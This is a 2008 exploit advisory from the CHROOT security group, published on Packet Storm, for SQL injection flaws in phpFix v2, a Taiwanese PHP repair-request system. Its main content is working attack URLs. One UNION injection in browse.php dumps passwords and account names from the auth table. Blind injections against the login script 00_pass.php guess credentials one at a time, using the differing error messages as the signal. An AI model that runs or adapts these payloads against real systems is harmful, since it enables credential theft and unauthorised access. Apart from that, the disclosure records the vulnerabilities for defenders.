phpfix-sql.txt

2008-05-27T00:00:00
ID PACKETSTORM:66700
Type packetstorm
Reporter unohope
Modified 2008-05-27T00:00:00

Description

                                        
                                            ` _____ _ _ _____ _____ _____ _____   
/ ___| |_| | _ \| _ | _ |_ _|   
| (___| _ | [_)_/| (_) | (_) | | |   
\_____|_| |_|_| |_||_____|_____| |_|   
C. H. R. O. O. T. SECURITY GROUP  
- -- ----- --- -- -- ---- --- -- -   
http://www.chroot.org  
  
_ _ _ _____ ____ ____ __ _   
Hacks In Taiwan | |_| | |_ _| __| | \| |  
Conference 2008 | _ | | | | | (__| () | |  
|_| |_|_| |_| \____|____|_|\__|  
http://www.hitcon.org  
  
  
Title :: phpFix v2 Multiple SQL Injection Vulnerability  
  
Author :: unohope [at] chroot [dot] org  
  
IRC :: irc.chroot.org #chroot  
  
ScriptName :: php線上報修系統 v2  
  
Download :: http://netlab.kh.edu.tw/download/php報修系統2.zip  
  
Mirror :: http://www.badongo.com/file/9541310  
  
_______________  
[SQL Injection]  
  
magic_quotes_gpc = Off  
  
safe_mode = Off  
  
- {browse.php} -  
  
http://localhost/phpfix/fix/browse.php?kind=-99+union+select+0,passwd,account,3,4,5,6,7,8,9,10,11+from+auth  
  
_____________________  
[Blind SQL Injection]  
  
- {00_pass.php} -  
  
http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+account+like+'blah% // for login account  
  
http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah% // for login password  
  
if matched, then return "密碼錯誤、請不要矇騙過關",  
else return "帳號錯誤、請不要矇騙過關",  
try error till you got it!  
  
______  
[NOTE]  
  
!! This is just for educational purposes, DO NOT use for illegal. !!  
  
  
# 2008/5/24 - chrO.ot group #  
`